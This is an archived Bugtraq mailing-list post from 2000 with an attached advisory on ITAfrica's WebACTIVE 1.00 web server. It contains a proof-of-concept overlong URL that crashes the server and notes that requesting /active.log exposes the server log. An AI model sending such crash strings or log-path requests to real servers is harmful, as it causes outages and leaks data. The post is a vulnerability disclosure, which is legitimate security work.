[15778] in bugtraq
Lame DoS in WEBactive win65/NT server
daemon@ATHENA.MIT.EDU (Prizm)
Thu Jul 13 20:35:05 2000
Content-Type: multipart/mixed;boundary="'ThIs-RaNdOm-StRiNg-/=_.593900701:"
Content-Transfer-Encoding: 8bit
Mime-Version: 1.0
Message-Id: <200007130827.BAA32671@Rage.Resentment.org>
Date: Thu, 13 Jul 2000 01:27:38 -800
Reply-To: Prizm <prizm@RESENTMENT.ORG>
From: Prizm <prizm@RESENTMENT.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
--'ThIs-RaNdOm-StRiNg-/=_.593900701:
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Length: 430
Content-Type: text/plain; charset=iso-8859-1
I was looking for a small server to download recently to show one of
my friends something I had made and later I messed about with this
little program a bit and noticed some DoS bug. I have enclodes a .txt
file on the problem in it. Not a big deal, very un-used product.
-Prizm
--'ThIs-RaNdOm-StRiNg-/=_.593900701:
Content-Disposition: attachment;filename=webactive.txt
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Length: 1719
Content-Type: text/plain
Application: ITAfrica's WebACTIVE version 1.00
Problem Type: Denial of Service
Author: Prizm<Prizm@RESENTMENT.org>
Platform(s): Windows 95/98/NT
Vendor Status: Not Informed, Project discontinued(I think)
Download URL: ftp://ftp.mira.net/mirrors/winsock-l/Windows95/Daemons/HTTPD/activ100.zip
Product Description
-------------------
WEBactive HTTP Server 1.00 is an HTTP/1.00-compliant World Wide Web server daemon for
Windows 95 or Windows NT, specifically designed for the SOHO (Small Office/Home)
environment. It will operate on any TCP/IP connection to the Internet, whether via temporary
dial-up or permanent leased-line connectivity.
Problem
-------
The problem is with bounds checking, when you request 280 characters Webactiv.exe just shuts down.
Quick Example:
http://somedomain/0000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
0000000
*Also* by simply requesting /active.log, you can view the webserver log, because active.log is
the default logfile name and the default directory is where that file is stored.
Vendor Status
-------------
Heh, this server was discontinued as far as I see... it is rather dated and doesn't support much.
Seeing as it was last revised in 1996, i think contacting the vendor would be rather meaningless... Also the fact that it is HTTP/1.00-compliant kind of hints it is no longer being updated.
Greetings
---------
Lamagra, Scrippie, eth0, Cruciphux/HWA and many others...
--'ThIs-RaNdOm-StRiNg-/=_.593900701:--
